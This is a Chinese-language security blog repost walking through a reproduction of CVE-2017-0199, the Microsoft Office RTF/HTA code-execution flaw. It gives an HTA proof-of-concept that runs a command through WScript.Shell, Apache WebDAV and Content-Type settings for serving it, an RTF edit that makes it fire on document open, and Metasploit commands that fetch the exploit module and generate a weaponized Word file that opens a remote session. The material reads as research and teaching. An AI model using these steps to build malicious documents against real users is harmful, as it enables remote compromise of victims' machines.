CVE-2017-0199漏洞复现过程

admin
admin
admin
140521
文章
117
评论
2022年1月6日05:19:57评论120 views1字数 2117阅读7分3秒阅读模式

From:http://fuping.site/2017/04/18/CVE-2017-0199%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E8%BF%87%E7%A8%8B/

准备工作

一台apache服务器(这里我用Kali)、POC和一个Word文档。
POC内容大概如下:


1
2
3
4
 
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\System32\cmd.exe /c calc.exe', 0);window.close();
</script>


Word文档内容任意。

CVE-2017-0199漏洞复现过程

然后将其放在Kali服务器上
Apache需要开启DAV支持,具体命令如下

1
2
3
4
 
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers

CVE-2017-0199漏洞复现过程

测试过程

在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf


1
2
 
root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf


新建Word文档,插入对象
如图

CVE-2017-0199漏洞复现过程

并保存为rtf文件,如233.rtf
删除服务器上的test.rtf文件
并将poc.hta文件复制到ms目录下,并改名为test.rtf


1
2
 
root@kali:/var/www/html/ms# rm -rf test.rtf 
root@kali:~/Documents# cp poc.hta  /var/www/html/ms/test.rtf


修改Apache配置

1
2
3
4
5
6
7
 
<Directory />
Dav on
</Directory>
<Directory /var/www/html/ms/>
Header set Content-Type "application/hta"  
</Directory>

CVE-2017-0199漏洞复现过程

并重启服务器service apache2 restart

打开233.rtf文档

双击word文档的文字,将会有惊喜弹出

CVE-2017-0199漏洞复现过程

打开文档就弹出的话需要将objectobjautlinkrsltpict修改为
objectobjautlinkobjupdatersltpict

CVE-2017-0199漏洞复现过程

再次打开文件

CVE-2017-0199漏洞复现过程

彩蛋(MSF下的实现)

在kali下执行。
首先更新msf到最新。(假设你们都完成了这个过程)

下载利用脚本


1
 
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb


然后msf下执行命令reload_all重新加载模块

CVE-2017-0199漏洞复现过程

下载rtf文件到/usr/share/metasploit-framework/data/exploits目录


1
2
3
 
cd /usr/share/metasploit-framework/data/exploits
wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf


开启hta服务

1
2
3
 
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
msf exploit(hta_server) > run

CVE-2017-0199漏洞复现过程

生成exploit文档

1
2
3
4
5
 
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
msf exploit(office_word_hta) > run

CVE-2017-0199漏洞复现过程

将生成的msf.doc文件复制到windows上,打开即可获取一个会话

如下所示

WIndows下结果

CVE-2017-0199漏洞复现过程

Kali下结果

CVE-2017-0199漏洞复现过程

参考文章

http://rewtin.blogspot.nl/2017/04/cve-2017-0199-practical-exploitation-poc.html?m=1
https://github.com/rapid7/metasploit-framework/pull/8254


本文始发于微信公众号(关注安全技术):CVE-2017-0199漏洞复现过程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日05:19:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2017-0199漏洞复现过程https://cn-sec.com/archives/501952.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息